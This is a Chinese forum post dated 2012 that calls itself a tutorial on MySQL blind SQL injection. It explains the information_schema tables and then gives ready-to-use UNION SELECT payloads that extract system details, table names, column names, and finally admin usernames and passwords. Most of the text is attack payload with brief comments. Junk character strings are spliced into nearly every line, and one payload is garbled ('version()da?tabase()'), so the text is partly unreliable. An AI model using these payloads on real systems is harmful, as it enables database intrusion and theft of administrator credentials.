本文介绍MYSQL盲注的一些语句和方法% ~, g+ O+ v* P7 R% G9 y
8 y' m8 p% D Z2 L; S+ J# G
学习盲注前先了解下 IFORMATION_SCHEMA 库8 s9 G& H& [) J
6 q+ _/ _5 I6 p3 z( H( F
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有6 [/ J5 |( n, P, T8 k2 {
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。6 m$ H6 W f) @% i1 {6 N
1.得到所有数据库名:
+ F# N( I3 V3 s0 @) \|SCHEMATA ->存储数据库名的表# @( \1 l! w1 B' w# o
|---字段:SCHEMA_NAME ->数据库名称
1 Q( E7 L5 r v2 Q2 D2 z/ z4 t4 U4 O: s% s4 W' o, n8 N' Y
|TABLES ->存储表名
( |4 i# k6 s; a0 {$ k6 S( Z" m2 u, u% X|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名; D2 a& @( P0 f- D; ^
|---字段:TABLE_NAME ->存储表的表名) [% h6 |% t! g6 v, [3 O
9 s4 h- P; ?8 W4 M: E4 I4 E, o z
|COLUMNS ->存储的字段名表
C! o; a, E9 k' D2 p- ^|---字段:TABLE_SCHEMA ->该字段所属数据库名/ e M1 K3 S* ~+ O2 y$ \% i
|---字段:TABLE_NAME ->存储所属表的名称
% q6 b$ Q( B: T7 K& s) K4 M3 V1 k
, c# T2 }% A+ @8 m|---字段:COLUMN_NAME ->该字段的名称
- B( O Q% I4 j) f
y9 y2 m9 t5 w2 |1 ?* ]9 J+ M - Z9 ^) L. A# h! R/ X
# N* {/ p- [" }% Y" }: a
###########################################################################
- A: i: w0 g( b5 m! B* Y6 P9 |: W, T. h
0x001 获取系统信息:3 _ U! b6 b9 r& E5 e q7 S
! W! Q' ]2 A/ N7 N
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*3 E4 p5 y: z) s$ i7 K2 L$ B* v
& p+ ^$ d8 O& D; f0 v' ^0 S) X: X/*% c) s8 M6 x' m' ^& t$ T/ y! q% `$ v
) d8 c/ H6 M3 Q; B; K
@@global.version_compile_os 获取系统版本
0 o) w! l' k4 K2 t: {$ {8 _0 H$ S2 C, g! n; A, r- v Q# m
@@datadir 数据库路径0 g8 N; Z3 w, W! L7 } G
database() 当前数据库名称- J4 W2 l- p: H5 ]
0x3c62723e 换行HEX值
8 p7 x5 x# O- G U- l6 I6 X, M% H# V
*/4 a' S! g( d: g* z
9 p# S7 G8 [ m9 }# e# P, b4 F : ^0 M$ F" [! e' o8 k$ W
2 E6 p2 T, v) F1 Q
######################################################################$ p( j& z! x1 T4 W, a
. R2 P: u) d& e8 `( ]0x002 获取表名
- j, O# j8 ?: X* k! T; B7 T& o; n; I. k+ n1 ^6 \3 P" A
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
. W" G6 I( A* R5 F. S/ |3 p( I- M# d& V2 \) T, D4 N! P5 ?
. q# ] Y) H. Y$ L$ C; E8 C
0 `8 W; D' q2 P# G
/*0 m9 b4 {* W5 `1 z Q
" q& V: y. ~3 ~; G! C" `. ~
0x67617264656e 为当前数据库名2 f% C( T- f4 j8 [' k: i
5 T+ ^8 o! K" l" N7 I: Wgroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名
% f# {$ j8 k' \8 g( U* p' A, N" S F
*/
) x# Z* p! D& S3 h+ c. d3 |) r) D" I
3 F* h0 x$ V0 g, c1 C4 p######################################################################6 [) h! K& o& j+ q$ p- s# Z4 `$ C2 `1 r
# j7 P! A' M. b7 C1 o. U; ~ _
! o2 {: a) w3 M$ d
7 W) P; M! a' x$ y) T' P0x003 获取字段) Z" J' I" L+ F$ u
: Z( E( q/ l9 H2 q" f0 o
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
7 Y' ?7 T8 t: q% H6 h7 s
3 ]) J* f9 n4 @6 z6 r! H7 Q/*
: f: _ N) `" C) j. y% d4 ?/ s/ J- v' Y9 m+ w
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
) b4 I& z* W1 @ w. ~8 |) d6 m
1 u) g' A9 t# b0 c7 M0x61646d696e ->选择一个表- J/ I7 H% |* h m# ]6 n/ L
- z1 [4 V9 ^, p" y3 N
0x67617264656e ->数据库名
* e* f% j v8 X0 w
" I6 ^& ~$ i* f& |*/
7 x/ |, Q& f+ m. t! k% g' N l$ K; c9 D, m4 B$ z4 @2 M& ]
#####################################################################& o3 n" w: |3 K4 R- m
' H& l- _8 r- S& L/ b3 E* H6 C( k . x% v2 B: W; h% X; b8 x- _
( a$ m& `0 O, g J% [" Q4 g1 K0x004 获取数据6 H$ j' }8 g5 J# F% f
$ {9 d5 c- g7 ?- q1 y: P1 @7 e/ Munion select 1,2,3
. h8 m8 M3 ]1 i4 I- }% r1 V,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin B+ q3 |% M- Z8 ~$ }$ k/ a8 W
; s" N4 K3 `: f% `$ Y0 z4 t
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
: A2 E2 r/ A4 y/ H; l- Q: w' T/ k7 n. e( O# |7 h9 g* {: N5 [- O
0 \. q& [ E. F& D! O
' G+ c# f. h4 B, h" y- q/*
( f& N" {9 L7 A. y% I5 L; E5 ^% Y$ ^$ O3 T: `& U
0x3c62723e 换行符号HEX编码( ?, [$ s. |: Q! f. j! E5 L
8 S! w: M# ?9 R1 c) a% q
group_concat 同时获得该字段所有数据
+ I0 p2 c# O( a; j8 n0 }. p4 T5 ]2 w/ y1 ~6 t. e% X
*/& }. V8 x* Q& F+ m
9 \& H) Q% s" |, Y% F |
发表于 2012-9-13 17:48:44
收藏
支持
反对